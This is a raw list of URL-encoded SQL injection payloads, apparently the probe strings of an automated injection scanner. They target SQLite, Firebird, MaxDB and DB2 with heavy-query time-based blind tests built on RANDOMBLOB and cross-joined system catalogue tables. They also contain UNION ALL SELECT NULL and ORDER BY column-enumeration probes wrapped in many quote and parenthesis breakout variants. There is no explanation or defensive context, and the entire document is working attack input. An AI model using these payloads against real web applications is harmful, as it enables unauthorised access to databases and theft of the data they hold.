-1756%22%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%22rqAh%22%20LIKE%20%22rqAh -6781%22%29%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%22TLYT%22%20LIKE%20%22TLYT -8868%22%29%29%29%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%22eDkD%22%20LIKE%20%22eDkD -7928%22%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%22KeEm%22%20LIKE%20%22KeEm -4039%29%20WHERE%207020%3D7020%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -9307%27%29%20WHERE%206246%3D6246%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -5921%27%20WHERE%208557%3D8557%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -9871%22%20WHERE%205600%3D5600%20OR%203855%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 -2027%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -3670%27%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -4437%27%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -6774%22%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -4715%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%288810%3D8810 -9566%29%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%285501%3D5501 -6928%29%29%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%286492%3D6492 -6378%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -2485%27%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%27YZtP%27%3D%27YZtP -3956%27%29%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%27ILkZ%27%3D%27ILkZ -1665%27%29%29%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%27yenp%27%3D%27yenp -5604%27%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%27uqgN%27%3D%27uqgN -7700%27%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%27LAgW%27%20LIKE%20%27LAgW -9672%27%29%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%27wLGr%27%20LIKE%20%27wLGr -6617%27%29%29%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%27fFoJ%27%20LIKE%20%27fFoJ -8717%27%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%27JTrh%27%20LIKE%20%27JTrh -7949%22%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%22YCLU%22%3D%22YCLU -2400%22%29%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%22dnNf%22%3D%22dnNf -4146%22%29%29%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%22uXbl%22%3D%22uXbl -3823%22%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%22cDjC%22%3D%22cDjC -5621%22%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%22OaRA%22%20LIKE%20%22OaRA -8774%22%29%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%22uJxp%22%20LIKE%20%22uJxp -8436%22%29%29%29%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%22PeCZ%22%20LIKE%20%22PeCZ -1872%22%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%22gnoO%22%20LIKE%20%22gnoO -9283%29%20WHERE%208578%3D8578%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -7127%27%29%20WHERE%205299%3D5299%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -7130%27%20WHERE%203850%3D3850%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -3341%22%20WHERE%202170%3D2170%20OR%202973%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 -3493%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -4447%27%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -3315%27%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -4305%22%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -5199%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%283839%3D3839 -3344%29%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%282073%3D2073 -6073%29%29%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%284594%3D4594 -7756%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -8514%27%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27gpbK%27%3D%27gpbK -7474%27%29%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27jHAL%27%3D%27jHAL -5518%27%29%29%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27MSLC%27%3D%27MSLC -1568%27%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%27kIRh%27%3D%27kIRh -8317%27%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27IEMt%27%20LIKE%20%27IEMt -5125%27%29%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27xvRx%27%20LIKE%20%27xvRx -5246%27%29%29%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27gTOt%27%20LIKE%20%27gTOt -5568%27%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%27gkuB%27%20LIKE%20%27gkuB -4361%22%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22KvFz%22%3D%22KvFz -6796%22%29%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22zLHq%22%3D%22zLHq -8333%22%29%29%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22fENu%22%3D%22fENu -3216%22%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%22gljU%22%3D%22gljU -8303%22%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22AwgZ%22%20LIKE%20%22AwgZ -8328%22%29%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22KVmk%22%20LIKE%20%22KVmk -4135%22%29%29%29%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22NASK%22%20LIKE%20%22NASK -4196%22%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%22JJNF%22%20LIKE%20%22JJNF -4483%29%20WHERE%201478%3D1478%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -6755%27%29%20WHERE%202799%3D2799%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -2709%27%20WHERE%204893%3D4893%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -6551%22%20WHERE%202305%3D2305%20OR%206796%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 -6960%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -3020%27%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -1877%27%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -2749%22%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -8546%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%283600%3D3600 -8587%29%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%286028%3D6028 -7274%29%29%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%289870%3D9870 -2746%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -6872%27%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27UJaQ%27%3D%27UJaQ -5185%27%29%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27fvjY%27%3D%27fvjY -1966%27%29%29%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27FjAL%27%3D%27FjAL -9593%27%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27Uhgp%27%3D%27Uhgp -6792%27%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27waJL%27%20LIKE%20%27waJL -9675%27%29%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27vIri%27%20LIKE%20%27vIri -4466%27%29%29%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27rGyr%27%20LIKE%20%27rGyr -4412%27%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27RXzW%27%20LIKE%20%27RXzW -7382%22%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22RcAk%22%3D%22RcAk -7764%22%29%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22GVQc%22%3D%22GVQc -7431%22%29%29%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22risg%22%3D%22risg -3162%22%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22ajuC%22%3D%22ajuC -2051%22%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22Jsol%22%20LIKE%20%22Jsol -5024%22%29%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22Wjqs%22%20LIKE%20%22Wjqs -2435%22%29%29%29%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22NkhJ%22%20LIKE%20%22NkhJ -6938%22%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22tWfc%22%20LIKE%20%22tWfc -6932%29%20WHERE%209019%3D9019%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -8291%27%29%20WHERE%201069%3D1069%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -1876%27%20WHERE%206103%3D6103%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -2996%22%20WHERE%202083%3D2083%20OR%201459%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1%29%20ORDER%20BY%201%23 1%29%20ORDER%20BY%205396%23 1%29%20UNION%20ALL%20SELECT%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20ORDER%20BY%201%23 1%27%29%20ORDER%20BY%207883%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20ORDER%20BY%201%23 1%27%20ORDER%20BY%201233%23 1%27%20UNION%20ALL%20SELECT%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20ORDER%20BY%201%23 1%22%20ORDER%20BY%206054%23 1%22%20UNION%20ALL%20SELECT%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20ORDER%20BY%201%23%20AND%20%289321%3D9321 1%29%20ORDER%20BY%207169%23%20AND%20%286947%3D6947 1%29%20UNION%20ALL%20SELECT%20NULL%23%20AND%20%288025%3D8025 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20AND%20%285868%3D5868 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%284820%3D4820 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%284163%3D4163 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%286421%3D6421 